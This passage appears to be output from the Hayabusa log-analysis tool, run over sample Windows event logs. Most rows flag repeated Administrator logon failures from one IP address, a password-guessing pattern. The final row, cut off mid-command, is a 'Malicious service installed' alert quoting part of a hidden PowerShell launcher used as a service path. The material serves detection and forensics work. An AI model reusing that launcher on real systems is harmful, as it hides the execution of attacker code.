NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.326 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HWMap8qHlykO6Yeu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pkc9LWakJBjhBQv6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y43cE75gTzA1XjHF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HopaYDAbYxHjJEr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: brNgudTWJaKs8nLd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzPwOqU92kdGodBH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXlzxK5OXL9hpqrZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2cLdgWvrVh7h2jPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.717 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h34xlYavVsXQRCYG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6wjflwqXyFzYTi0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.795 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MlsuCSajqGUYTBWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xQDdrQQZ5xYBDiRi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JX5NMuwUsOZEp3zh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfrbGLqKGru8AE2a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:46.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 813natbodi6QauRW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KpfKxOZG3xSr5Yqm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fErWiEb0USDghXsB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fOWF6YnW8UEPlw41 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SNPXuHduatLFQc8W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.157 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 35rfur4MzKzwxCIn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.201 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VmAqzaZaeoSjcuh5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKuCpuGcGmDOoewr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bz6SOAeTyqsBz6Oa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CSURiEoC7dw0w0ru : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bDjwkaHT8lrFmn9X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ayI129HgVWA5q4Sk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jT2yiuOJS8Fvf9SD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1hpAO2UrjFd6Kxt0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZkgGj9Fnqn3XwnBT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFXPYo0yzR7p8dNU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9j6MxN7PuM29Vlcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w1CWIqoV6GzmmlRm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiBfvnfTcIG4xJoi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dED7HYntoE5D7XvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pX1ztnCKiePrPbTT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u3XQcfMHJDsBtJDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MhRsRIS5tHKLv2oL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.917 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmkLhptugDU2fDWp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2yk62yREbgDCj9pB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:47.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6JPvkmaAsJlwn9t3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lhciP1zM9njlRI3j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.069 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: duNDenwdo1oHVuoL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.114 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0ChBZOYkTm1SguA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RU38tuiKC0weexmb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jg0Hp4xtz0pAMhCz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.231 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5AorVNz5MgTeEvn2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8oJ6tVjBxlYyj5ej : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oEAEOi0TsSRVPlz4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: USfEwKkH8OUADVds : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y0jg1i6tDiInd10i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xv2jRzrgoP6lJdAJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LmuAXUwSkhR3tSRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zy4Fkpvcrlmp9AES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 51ipUXvrRh0CPH1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.670 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5TB15XKzVJwIyjqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i1F6muFPBlPyHPbR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XNXwYS73RElHozUo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ft1MLPJISeq0bMsa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i8kbFOwQiCyRVMDV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ToPzuDEmXN1fjIcS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.924 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pKF1QKEuTXIGnrx2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:48.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fyHpo6pX8TEo6ttv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3uYqEt90yr8B3rK9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2LKkrM0slVn0CKHw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyJ82cfaddnc8c6D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KJRw0S82SupmuS4Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.161 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: z4lSo9BMWdcPLfLb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XreSLg472qhJw0R3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.266 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIJcQJKLmnjrE2T9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlddo3GCTEIkFyi9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hxiZoB5mHR2tGUFM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:49.399 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fpEbpiox2Q3Qf8av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 05:36:09.147 +09:00,IE10Win7,7045,high,Malicious service installed,"Service: zIGuwymOgHZnXZPm : Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 